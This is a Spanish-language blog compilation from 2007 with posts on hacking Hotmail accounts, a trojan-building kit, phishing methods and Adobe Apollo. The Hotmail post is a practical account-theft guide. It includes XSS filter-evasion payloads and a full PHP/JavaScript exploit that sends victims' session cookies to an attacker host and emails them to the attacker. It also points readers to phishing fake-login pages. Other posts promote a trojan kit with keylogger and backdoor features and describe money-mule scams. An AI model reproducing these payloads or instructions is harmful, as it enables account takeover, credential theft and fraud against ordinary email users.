Recopilacion de post interesantes realizados en el mes de julio 2007:

• Hackear Hotmail : Hacia tiempo tenia ganas de hacer este post, debido a que mucha gente me pregunta como hackear cuentas de correo de hotmail, y la verdad que este tipo de tecnicas no se les puede llamar en si "hacking" aunque tratare de ampliarme lo mas que pueda en XSS Hotmail y el uso de lanzadores o fakemail [...]
  
  
• Troyano a la medida : Aun me acuerdo de aquellos tiempo en que si querias un troyano lo programabas tu mismo ya sea con unas caracteristicas muy modestas o muy avanzadas, actualmente eso ya quedo en el pasado, existen en internet ciertos kit's de creacion de troyanos, el llamado Pinch Kit[...]
  
  
• planetaonline.org : Planeta online es un conjunto de blog's donde se comparte informacion, al mas puro estilo de los blog's corporativos de Sun Microsystems, pero enfocados al publico hispano.Es sin duda una idea innovadora y gracias a esto los bloggers encuentran una selección de artículos que comentar[...]
  
  
• Phishing al Descubierto : El phishing como tema en si, es muy amplio y complicado, aqui tratare de manera muy general explicar algunas tecnicas utilizadas y las herramientas empleadas.El phishing es un conjunto de tecnicas utilizadas para suplantar una entidad en internet y estafar a sus usuarios, por lo general siempre estan basadas en vulnerabilidades [...]
  
  
• Adobe Apollo : Apollo es un expansion de flex, un desarrollo implemantado por la compa~ia Adobe, para realizar aplicaciones de escritorio con la capacidad del desarrollo web[...]

Hacia tiempo tenia ganas de hacer este post, debido a que mucha gente me pregunta como hackear cuentas de correo de hotmail, y la verdad que este tipo de tecnicas no se les puede llamar en si "hacking" aunque tratare de ampliarme lo mas que pueda en XSS Hotmail y el uso de lanzadores o fakemail.

Tengo que aclarar que yo no soy ningun experto en esto y fracamente nunca me ha interesado saber como se consiguen la contrase~a de un correo, si no, que solo me dio curiosidad de saber como hacen este tipos de cosas y cobran bastante bien (lease renthackers).

Aqui voy a tratar temas quizas un poco complejos para la gente que no esta familiarizada con este tipo de cosas, pero que son a las que mas les interesa el tema.

• Fakemail creacion y uso
• XSS Hotmail busqueda y explotacion

Fakemail creacion y uso

Los fakemails o lanzadores, no son mas que paginas de login falsas, especialmente creadas para el robo de credenciales legitimas de una entidad electronica, entiendase que los fake no solo son aplicables en entidades de correo electronico, si no que tambien son aplicables a paginas de otro tipo de entidad, en donde sea factible el robo de credenciales.

Existen en internet paginas especialmente dedicadas al uso de este tipos de fake, de facil uso y bastante efectivas, los lanzadores proporcionados son de distintos tipos, pueden ser de los que capturan el password y lo envia al correo del atacante, de los que capturan el password y el atacante tiene que entrar de nuevo a la pagina por el password, o bien paginas que no hacen nada y se quedan con el password para diferentes propositos, ya sea para listas de spam, busqueda de informacion sensible en los correos, distribuir correo basura desde la cuenta.

• zoftwarez.net/fakez/
• Fake terra
• Invitacion MSN
• MSN Error
• Postales Bubba
• Postales gusanito
• Fake contacto
• Poemas
  

La programacion de este tipo de sripts no son dificiles de hacer en PHP, ya que se basan unicamente en formularios y en la funciona mail() de PHP, y es esta una de las causas por los que hostings gratuitos no permiten usar esta funcion, debido al correo basura que facilmente se puede implementar asi.

Es impresionante como estos scripts en PHP esta libremente distribuidos por el internet, y estan al alcance de cualquier usuario que este dispuesto a pasar una tarde en su instalacion y modo de empleo.

=================

XSS Hotmail busqueda y explotacion

Encontrar una vulnerabilidad XSS en hotmail no es dificil y tampoco es cosa del otro mundo, utilizando algunas opciones avanzadas de Google en cuestion de segundos tendremos a nuestro alcance un gran banco de pruebas para intentar sacar un XSS

La busqueda de de este tipo de vulnerabilidades es muy sencilla, utilizando los filtros de Google "inurl" y el filtro "site" podemos encontrar muchisimas paginas en las que podemos intentar buscar alguna vulnerabilidad en cualquiera de las varibles pasadas por el metodo GET por URL.

La explotacion de las vulnerabilidades es de igual forma muy sencilla, utilizando entradas especialmente modificadas para saltarse los filtros que han implementado los de hotmail para evitar este tipo de ataques contra sus usuarios, en general se utilizan entradas malformadas basadas en javascripts por ejemplo:

< src="javas&\#09;cript:alert(document.cookie);">
/*NOTA: Agregar a la linea anterior la etiqueta IMG, al parecer Blogger lanzo sus filtros contra mi =P*/

Utilizando la etiqueta IMG de HTML se explota su argumento SRC introduciendole una funcion javascripts para mostrarnos la cookie de la pagina actual, la formacion de este tipo de entradas se puede modificar de manera sencilla, normalmente se pasan algunos caracteres de la entrada a su equivalente en ASCII para evitar que sea detectada por los filtros de hotmail y el navegador web pueda interpretarla sin problemas.

Para realizar ataques un poco mas avanzados que realicen la funcion, que en cuanto se abra el correo electronico, dado como exito el ataque, es utilizando la funcion javascripts document.location.replace() y el uso de diferentes etiquetas HTML, como pueden ser:

• img src="" dynsrc="javascript:alert('XSS');"
• input src="javascript:alert('XSS');" type="image"
• meta equiv="refresh" content="0;url=javascript:alert('XSS');"
  
• BR SIZE="&{alert('XSS')}"
  

Hay infinidad de entradas que pueden ser modificadas para optimizar el uso del XSS, oviamente para explotar este tipo de vulnerabilidades es necesario enviar un correo electronico a la victima en forma de HTML y que contenga cualaquiera de las entradas anteriores, por ejemplo para que sea vulnerado en cuanto abra su correo electronico bastaria con agregar la siguiente:


img src="jAvascrIpt:document.location.replace('http://atacante.com/xploit.js?'+docum
ent.cookie)"

La edicion de esta cadena se puede modificar facilmente, la explotacion automatica de este tipo de vulnerabilidades estan basadas en ciertos xploits que estan distribuibles libremente por el internet, aqui solo me remitire a explicar el uso de uno.

--------INDEX.PHP------------------
<\html\>
<\body\>
<\iframe src="http://ATACANTE.COM/HOTMAIL/ind.php" width="10" height="10" \>
link
<\/iframe\>

--------------------------------------
-------IND.PHP-----------------------------

$mysite = "http://ATACANTE/HOTMAIL/nice.js";
$xpl = "http://VICTIMA.COM/variable=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//ATACANTE.COM/HOTMAIL/nice.js%3E%3C/script%3E";
print'

<\body\>
<\ meta equiv="Refresh" content="1; URL='.$xpl.'" \>
';
?>
---------------------------------------------
------LOG.PHP----------------------------

$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");

$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("mail@atacante.com", $subject, $msg);

header ("location: asd.gif");
?>
--------------------------------------------
---------NICE.JS--------------------------
location.href='http://ATACANTE/HOTMAIL/log.php?nice='+escape(document.cookie)
-------------------------------------------


El uso del exploit es muy sencillo, y facilmente se puede poner en practica, son archivos PHP que en base de un archivo javascripts explotan esta vulnerabilidad y logran obtener la preciada cookie para despues enviar al correo del atacante y este pueda ingresar a la cuenta de la victima.

NOTA: En la edicion de este post me pude percatar de como blogger edito automaticamente algunas cadenas modificadas que habia puesto a modo de ejemplo, y otras que no me edito y que me mostraron la cookie de mis credenciales en blogger, esto demuestra que hasta paginas tan importantes como estas pueden ser vulnerables a este tipo de ataques, oviamente las entradas que ocasionaron estos errores no fueron publicadas y que seran el motivo de un futuro post.

Suerte y hasta la proxima.

xploit

Aun me acuerdo de aquellos tiempo en que si querias un troyano lo programabas tu mismo ya sea con unas caracteristicas muy modestas o muy avanzadas, actualmente eso ya quedo en el pasado, existen en internet ciertos kit's de creacion de troyanos, el llamado Pinch Kit.

Con este tipo de kit's de desarrollo se pueden crear troyanos realmente muy personalizables, hacia tiempo ya, recuerdo que habia kit's para crear virus, bueno pues este es identico, pero con el simple hecho que puedes crear virus realmente muy avanzados y con la peculariedad de que se escapan de vista a la heuristica de los antivirus.

El kit, cuenta con las siguientes caracteristicas:

• Servidor SMTP
• Comunicacion atravez de diferentes clientes de IM y servidores FTP
  
• Empaquetado y cifrado del ejecutable
• Diferentes opciones de comportamiento
• Ocultacion avanzada del proceso
• Cifrado de email con password
• Opciones de keyloger y spyware
• Opciones de backdoor, para usar a la victima como plataforma de ataque
• Leer mas

Versiones superiores:
http://pro-hack.ru/

Mas informacion:
http://noticiastech.com/
http://arstechnica.com/
http://blogs.pandasoftware.com/

Descarga

Planeta online es un conjunto de blog's donde se comparte informacion, al mas puro estilo de los blog's corporativos de Sun Microsystems, pero enfocados al publico hispano.

Es sin duda una idea innovadora y gracias a esto los bloggers encuentran una selección de artículos que comentar. Una forma inteligente y gratis de generar interactividad en un medio e incrementar la popularidad.

planetaonline.org

El phishing como tema en si, es muy amplio y complicado, aqui tratare de manera muy general explicar algunas tecnicas utilizadas y las herramientas empleadas.

El phishing es un conjunto de tecnicas utilizadas para suplantar una entidad en internet y estafar a sus usuarios, por lo general siempre estan basadas en vulnerabilidades de los navegadores web para poder llevar a cabo la suplantacion con exito, o incluso sin necesidad de una vulnerabilidad se pueden llevar a cabo, una tecnica muy usada es el DNS Spoof el cual se usa para modificar la tabla de DNS de un ISP y de esta forma es sencillamente suplantar una entiendad, cuando se usa esta tecnica al proceso se le denomina PHARMING, de igual forma se usa el termino cuando se usa algun software externo para cumplir con el objetivo.

Entre los software externos se pueden usar los virus troyanos, que son muy usados por phishers para poder cumplir con sus objetivos, por lo general estos troyanos gozan con la caracteristica de ser keylogers y de esta forma capturar las cuentas de los usuarios, existen por internet troyanos programados para este fin en especial, contando con caracteristicas como la captura de teclas, modificacion del archivo hosts, captura de pantalla, sniffing de trafico, pero aun asi hay troyanos aun mas avanzados utilizados con el unico fin de usar a las victimas como plataforma de ataque, facilitando enormemente el trabajo del phisher, ya que podra realizar otro tipos de tecnicas sin la preocupacion de ocultarse atraves de proxys anonimos o las redes tor.

La industria virica entra en gran enfoque debido a que es utilizada para este fin, software's como malware, worms y troyanos son muchas veces usados como herramientras alternativas para un phisher, en general los phishers no tienen conocimientos profundos sobre la programacion de virus, por eso se ayudan de los servicios de gente que si conoce la escena para cumplir con sus objetivos.

Entre las herramientras mas usadas por un phisher para atraer victimas estan:

• Remailer
• Scam
• Phpshell
• Una vulnerabilidad

Remailer: esta herramienta puede ser desde un peque~o remailer programado en php hasta un servidor SMTP especialmente instalado para este fin, existen un sin fin de remailers en internet, todos ellos necesitan solamente de una lista de correos recolectados atraves de robots en internet.

Scam: el scam es un herramienta utilizada para atraer victimas con falsas promesas, ya sea de trabajo o de dinero gratis, a las victimas se les denomina muleros, los muleros son el objetivo central del phisher, debido a que seran a ellos los que haran el fraude y seran a ellos a quienes sentenciaran.

Al mulero se le proporciona informacion sobre como debe de realizar su trabajo al igual que herramientas para realizarlo, la mayoria de muleros, son utilizados por el phisher para enviar correos electronicos de manera masiva e interactuar con la victima del fraude, el mulero recibe una peque~a porcion del fraude para motivarlos a seguir realizando las peticiones del phisher y de esta forma ser parte del fraude sin que este lo sepa.

Phpshell: Una shell en php no es mas que un script con el cual se puede administrar un servidor y optener privilegios sobre sus archivos, utilizan esta herramienta que en ocasiones se usa para explotar una vulnerabilidad RFI, se usa para poder subir un scam y un remailer al servidor y poder realizar los ataques a las victimas.

Una vulnerabilidad: Como ya mencione en este post, las vulnerabilidades entran en juego en las estafas en internet, existen infinidad de vulnerabilidades sobre navegadores webs, sistemas operativos, servidores, lenguajes.

La mayoria de ataques de phishing utilizan alguna vulnerabilidad web ya sea para falcificar la URL del navegador web o para instalar software en la victima.

Este articulo sera continuado en otro post continuo, debido a lo extenso del tema, y sobre los objetivos que espero tratar en el.
Hasta la proxima.
TEMAS FALTANTES:
- Equipos de phishing
- Phishig kit
- Modo de operacion del phishing / practica
- Analizando una entidad falsa / practica
- A la caza del phisher
- Descarga de herramientas
- Conclusiones finales

Hacking: The Art of Exploitation by Jon Erickson ISBN:1593270070 No Starch Press © 2003 (241 pages) This text introduces the spirit and theory of hacking as well as the science behind it all; it also provides some core techniques and tricks of hacking so you can think like a hacker, write your own hacks or thwart potential system attacks.

Descargar | Codigo de descarga: 72324789690

Apollo es un expansion de flex, un desarrollo implemantado por la compa~ia Adobe, para realizar aplicaciones de escritorio con la capacidad del desarrollo web, lo mas sobresaliente de esto es que implementan un SDK para poder hacer las aplicaciones multiplataformas, hasta ahi nada fuera de lo comun, lo extraordinario de esto es que se pueden realizar aplicaciones con un grado de desarrollo muy avanzado y un dise~o realmente impresionante que es lo que mas me llama la atencion.

Sin duda Apollo es una gran aplicion y un digno caso de estudiar a fondo, pero lamentablemente el tiempo se me va de las manos.

La informacion sobre este software abunda bastante en internet, sobre todo en la web de Adobe, pero hay en particular la web cristalab que han desarrollado un gran enfoque en este software, prueba de ello es este tutorial.

• Tutorial de Adobe Apollo
  

Aprovechando este post, le hago el comentario que sigan de cerca a estos chicos de cristalab ya que implementan a gran escala la tecnologia de Adobe, y aplaudo la magnifica conferencia en linea que impartieron el pasado 21 de Julio.

Esta es la primera entrada de mi blog, que en si no tiene mucho en especial que los demas blogs, pero si hay algo en particular que se, es la informatica y eso pienso compartir con todo aquel lector de RSS.

El dise~o de este primer release esta basado en no se que, pero quise imprimentar un dise~o minimalista llegandole a lo cutre dando como resultado este perpicaz intento de pagina hecha en THE GIMP.

Espero tener contenidos un poco interesantes para aquellos que me lean y sobre todo de que yo leo.

Saludos.